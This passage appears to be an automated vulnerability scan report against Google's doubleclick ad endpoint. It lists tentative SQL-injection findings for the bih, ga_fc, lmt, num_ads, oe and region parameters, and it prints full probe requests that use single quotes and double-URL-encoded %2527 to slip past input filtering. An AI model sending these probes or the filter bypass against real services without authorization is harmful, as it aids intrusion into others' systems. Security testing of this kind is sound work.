Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:15:29 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3150

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.6. http://googleads.g.doubleclick.net/pagead/ads [bih parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bih parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bih parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the bih request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010%2527&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:12:48 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3002

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
tors%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Integrated Holistic \x26amp; Cutting Edge";
google_ad.line3 = "Unique Rehab. Exceptional Success.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3Fco
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010%2527%2527&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:12:49 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2774

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.7. http://googleads.g.doubleclick.net/pagead/ads [ga_fc parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ga_fc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_fc parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ga_fc request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1%2527&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:07:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2980

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
tors%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Integrated Holistic \x26amp; Cutting Edge";
google_ad.line3 = "Unique Rehab. Exceptional Success.";
google_ad.regionname = "";
google_ads[0] = google_ad;
google_ad = new Object();
google_ad.n = 2;
google_ad.type = "text";
google_ad.bidtype = "CPC";
google_ad.targeting_type = "con
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1%2527%2527&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:07:19 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3020

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.8. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The lmt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lmt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925'&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 14:58:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3031

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
%2520treatment%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Luxury Alcohol/Drug Rehab";
google_ad.line2 = "Non-12 Step Addiction Cure Center";
google_ad.line3 = "Known for Exceptional Cure Rate.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3F
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925''&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 14:58:55 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2828

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.9. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2'&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 14:59:07 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 23019

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Drug Treatment For Attorneys";
google_ad.line2 = "Integrated Holistic \x26amp; Cutting Edge";
google_ad.line3 = "Unique Rehab. Exceptional Success.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_ad = new Object();
google_ad.n = 3;
google_ad.type = "text";
google_ad.bidtype = "CPC";
google_ad.targeting_type = "con
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2''&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 14:59:09 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 22385

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.10. http://googleads.g.doubleclick.net/pagead/ads [oe parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The oe parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the oe parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the oe request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8%2527&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:01:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3049

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
or%2520attorneys%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Non-12 Step Addiction Cure Center";
google_ad.line3 = "Known for Exceptional Cure Rate.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3F
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8%2527%2527&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:01:21 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2911

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/pagead/ads [region parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The region parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

